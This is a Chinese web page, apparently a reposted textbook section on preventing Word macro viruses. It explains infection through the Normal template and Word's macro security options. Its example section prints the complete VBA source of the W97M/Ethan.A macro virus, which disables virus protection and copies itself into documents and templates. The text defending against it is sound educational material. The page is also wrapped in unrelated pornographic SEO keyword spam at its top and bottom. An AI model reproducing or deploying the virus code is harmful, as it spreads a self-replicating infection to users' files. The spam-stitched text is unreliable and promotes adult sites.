<span id="w0wez"></span>
    1. <rt id="w0wez"></rt><center id="w0wez"><optgroup id="w0wez"></optgroup></center>
    2. <center id="w0wez"><optgroup id="w0wez"></optgroup></center>

      <label id="w0wez"><xmp id="w0wez">
      日韩精品亚洲不卡一区二区,久在线视频播放免费视频,天美传媒一区二区,国产高清一区二区三区视频,精品国产中文字幕在线看,日韩精品一区二区三免费,午夜精品一区二区三区成人,国产成人精品午夜在线观看
      VIP標識 上網做生意,首選VIP會員| 設為首頁| 加入桌面| | 手機版| RSS訂閱
      食品伙伴網服務號
       

      Word 宏病毒防治

      放大字體  縮小字體 發布日期:2006-06-15

        宏是Word 里一個非常有用的工具,但也是Word 的安全漏洞之一。 有一些惡意的人利用宏制造宏病毒,給別人帶來麻煩。宏病毒是一 種寄存在文檔或模板的宏中的計算機病毒。一旦打開這樣的文檔, 宏病毒就會被激活,轉移到計算機上,并駐留在 Normal 模板上。 從此以后,所有自動保存的文檔都會“感染”上這種宏病毒,而且 如果其他用戶打開了感染病毒的文檔,宏病毒又會轉移到他的計算 機上。

      13.1 宏病毒
          宏病毒已經成為發展最快和傳播最迅速的病毒。美國國際計算機 安全協會ICSA 的《ICSA 1998 病毒流行調查報告》表明宏病毒獨占 1998 年十大病毒感染事件的72%,在十大病毒中占了五席交椅: WM/Concept、WM/Cap、WM/Wazzu、WM/Npad 和XM/Laroux。根據 DataFellow 公司每天特征碼升級的F-Macro 所檢測到的宏病毒數 目,至1998 年12 月達到了3,332 個,而在1997 年12 月才是1,821 個,增長率為83.0%。而且F-Macro 并不能檢測到所有宏病毒。在1998 年12 月出現了Word Class Object 的宏病毒,是由VicodinES 編寫的。

      13.1.1 宏病毒
          許多應用程序都允許在用戶的數據庫中包含一些宏,隨著應用軟 件的進步,宏語言的功能也越來越強大,其中微軟的Word Visual Basic for Application(VBA)已經成為應用軟件宏語言的標準。 利用宏語言,可以實現幾乎所有的操作,還可以實現一些應用軟件 原來沒有的功能。每個模板或數據文件中,都可以包含宏命令。
          有不少應用軟件允許用戶利用宏修改軟件菜單的功能,并可以將 某一個宏加入到菜單中或設置成自動運行的命令。利用這個功能, 宏就可以修改軟件本身的功能,從而將軟件本身修改為病毒傳播的 源泉。
          宏病毒就是利用Word VBA 進行編寫的一些宏,這些宏可以自動 運行,干擾用戶工作,輕則降低工作效率,重則破壞文件,使用戶 遭受巨大損失。
          一旦打開含有宏病毒的文檔,其中的宏就會被執行,于是宏病毒 就會被激活,轉移到計算機上,并駐留在Normal 模板上。從此以后, 所有自動保存的文檔都會“感染”上這種宏病毒,而且如果其他用戶打開了感染病毒的文檔,宏病毒又會轉移到他的計算機上。
          宏病毒成為傳播最快的病毒,其原因有三個:第一,現在用戶幾 乎對可執行文件病毒和引導區病毒已經有了比較一致的認識,對這 些病毒的防治都有一定的經驗,許多公司、企業對可執行文件和磁 盤的交換都有嚴格的規定。但對宏病毒的危害還沒有足夠的認識, 而現在主要的工作就是交換數字文件,因此使宏病毒得到迅速傳播。 第二,現在的查病毒、防病毒軟件主要是針對可執行文件和磁盤引 導區設計的,一般都假定數據文件中不會存在病毒,而人們相信查 病毒軟件的結論,從而使隱藏在數據文件中的病毒成為漏網之魚。 第三,CD-ROM 和Interenet 使病毒的傳播速度大大加快
        如果某個文檔中包含了宏病毒,我們稱此文檔感染了宏病毒;如 果Word 系統中的模板包含了宏病毒,我們稱Word 系統感染了宏病 毒。
          Word 2000 無法掃描軟盤、硬盤或網絡驅動器上的宏病毒(要得 到這種保護,需要購買和安裝專門的防病毒軟件)。但當打開一個 含有可能攜帶病毒的宏的文檔時,它能夠顯示宏警告信息。這樣就 可選擇打開文檔時是否要包含宏,如果希望文檔包含要用到的宏(例 如,單位所用的定貨窗體),打開文檔時就包含宏。如果您并不希望在文檔中包含宏,或者不了解文檔的確切來源。例如,文檔是作 為電子郵件的附件收到的,或是來自網絡或不安全的Internet 節點。 在這種情況下,為了防止可能發生的病毒傳染,打開文檔過程中出 現宏警告提示時最好選擇【取消宏】。
          Word 軟件包安裝后,系統中包含有關于宏病毒防護的選項,其默 認狀態是允許【宏病毒保護】復選框。如果愿意,可以終止系統對 文檔宏病毒的檢查。當Word 顯示宏病毒警告信息時,清除【在打開 帶有宏或自定義內容的文檔時提問】復選框。或者關閉宏檢查:單 擊【工具】菜單中的【宏】命令,再從級聯菜單中選擇【安全性】 命令,出現【安全性】對話框,選擇【安全級】選項卡,將安全級 別設為【無】。不過一般建議用戶不要取消宏病毒防護功能,否則 會失去這道防護宏病毒的天然屏障。

      13.1.2 宏病毒示例
          為了更好地理解宏病毒, 我們仔細分析一下宏病毒 W97M/Ethan.A。

      下面是該病毒的代碼。
      Private Sub Document_Close()
      On Error Resume Next
      s = ActiveDocument.Saved
      Application.EnableCancelKey = Not -1
      With Options: .ConfirmConversions = 0: .VirusProtection
      = 0: .SaveNormalPrompt = 0: End With
      Randomize
      If Dir("c:\ethan.___", 6) = "" Then
      Open "c:\ethan.___" For Output As #1
      For i = 1 To MacroContainer.VBProject.VBComponents.Item
      (1).CodeModule.CountOfLines
      a = MacroContainer.VBProject.VBComponents.Item
      (1).CodeModule.Lines(i, 1)
      Print #1, a
      Next i
      Close #1
      SetAttr "c:\ethan.___", 6
      End If
      If Dir("c:\class.sys") <> "" Then Kill "c:\class.sys"
      If NormalTemplate.VBProject.VBComponents.Item
      ( 1 ) .CodeModule.Lines ( 1, 1 ) <> "Private Sub
      Document_Close()" Then
      Set t = NormalTemplate.VBProject.VBComponents.Item(1)
      ElseIf ActiveDocument.VBProject.VBComponents.Item
      ( 1 ) .CodeModule.Lines ( 1, 1 ) <> "Private Sub
      Document_Close()" Then
      Set t = ActiveDocument.VBProject.VBComponents.Item(1)
      Else
      t = ""
      End If
      If t <> "" Then
      Open "c:\ethan.___" For Input As #1
      If LOF(1) = 0 Then GoTo q
      i = 1
      Do While Not EOF(1)
      Line Input #1, a
      t.CodeModule.InsertLines i, a
      i = i + 1
      Loop
      q:
      Close #1
      If Rnd < 0.3 Then With Dialogs
      ( wdDialogFileSummaryInfo ) : .Title = "Ethan
      Frome": .Author = "EW/LN/CB": .Keywords =
      "Ethan": .Execute: End With
      If Left(ActiveDocument.Name, 8) <> "Document" Then
      ActiveDocument.SaveAs
      FileName:=ActiveDocument.FullName
      End If
      If ActiveDocument.Saved <> s Then ActiveDocument.Saved
      = s
      End Sub

          W97M/Ethan.A 是一種寄生型宏病毒,由一個宏組成,能夠感染 Word 系統中的文檔和模板。在感染過程中,W97M/Ethan.A 使用一種 特殊的算法,從自己的源文件向宿主文件傳送病毒代碼,在源文件 中存放的是以VBA 代碼形式存放的病毒程序。一旦感染成功,W97M/Ethan.A 會刪除自身的有關文件,隱藏蹤跡,并將感染所有訪 問過的Word 文件

        在被感染的Word 文件中,大概有三成幾率的文件屬性會被病毒 更改,其標題會被改為“Ethan Frome”,而作者會被改為“EW/LN/CB”。 如果發現上述特征,則說明此文檔已被W97M/Ethan.A 宏病毒感染。
          對已感染的文檔進行操作,可能會出現以下問題:
          (1)在存儲文檔時,無法以Word 文檔格式存儲,而只能存儲為 Word 模板格式。
          (2)在打開文檔時,Word 系統會向用戶詢問文檔的開啟密碼, 否則無法訪問該文件。
          (3)在清除了宏病毒之后,仍然看不到Word 系統中的某些命令 或選項,它們可能已被宏病毒刪除。

       
      [ 網刊訂閱 ]  [ 食品專題搜索 ]  [ ]  [ 告訴好友 ]  [ 打印本文 ]  [ 關閉窗口 ] [ 返回頂部 ]

       

       
      推薦圖文
      推薦食品專題
      點擊排行
       
       
      Processed in 0.617 second(s), 1109 queries, Memory 3.37 M
      主站蜘蛛池模板: 亚洲综合成人av在线| 91精品国产自产在线蜜臀| 成人午夜天| 中文字幕日韩精品东京热| 成人午夜免费无码区| 亚洲国产美女精品久久久 | 亚洲乱人伦中文字幕无码| 一区二区三区四区亚洲综合| 亚洲成人高清av在线| 亚洲手机在线| 久久国语露脸国产精品电影| 亚洲国产一区二区三区四| 午夜福利麻豆国产精品| 国内精品久久久久影院网站| 中文字幕Aⅴ人妻一区二区苍井空| 暖暖 在线 日本 免费 中文| 蜜臀91精品高清国产福利| 2019年国产精品自拍不卡| 少妇被黑人到高潮喷出白浆 | 中文字幕亚洲制服在线看 | 在线看无码的免费网站| 天天色天天综合网| 亚洲精品乱码久久久久久蜜桃不卡| 色婷婷综合久久久久中文一区二区 | 国产av午夜精品福利| 精品国产成人a在线观看| 精品无码一区二区三区AV| 最新国产麻豆AⅤ精品无码| 国产中文欧美日韩在线| 一区二区三区综合在线视频| 深夜福利国产精品中文字幕| 亚洲国产成人精品无码区蜜柚| 国产按头口爆吞精在线视频| 尤物国产精品福利在线网| 午夜福利国产一区二区三区| 99精品国产久热在线观看| 国产福利小视频高清在线观看| 国产精品国三级国产av| 欧洲精品不卡1卡2卡三卡| 美日韩精品综合一区二区| 9色国产深夜内射|